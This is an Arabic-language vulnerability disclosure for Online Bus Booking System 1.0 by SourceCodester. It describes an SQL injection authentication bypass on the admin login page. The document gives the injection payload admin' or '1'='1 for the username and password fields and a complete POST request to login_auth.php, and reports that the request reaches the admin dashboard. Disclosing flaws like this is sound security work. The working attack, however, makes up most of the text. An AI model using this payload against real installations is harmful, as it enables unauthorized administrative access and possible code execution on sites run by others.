
نظام حجز الحافلات عبر الإنترنت 1.0، يوجد تجاوز للمصادقة على شاشة تسجيل دخول المشرف في admin.php عبر حقن SQL في اسم المستخدم أو كلمة المرور.
Online Bus Booking System 1.0، توجد ثغرة تجاوز المصادقة في شاشة تسجيل دخول المدير في admin.php عبر حقن SQL في اسم المستخدم أو كلمة المرور.
#البائع - SourceCodester
#المنتج -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html الإصدار 1.0
#نوع الثغرة - تجاوز المصادقة
#المكوّن المتأثر - bus_booking/admin.php
#نوع الهجوم- محلي
#تصعيد الامتيازات - true
#تأثير تنفيذ التعليمات البرمجية - true
متجه الهجوم
انتقل إلى لوحة تسجيل دخول المدير وحاول تجاوزها
في حمولة الطلب، عيّن
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
تم تسجيل الدخول بنجاح إلى لوحة تحكم المدير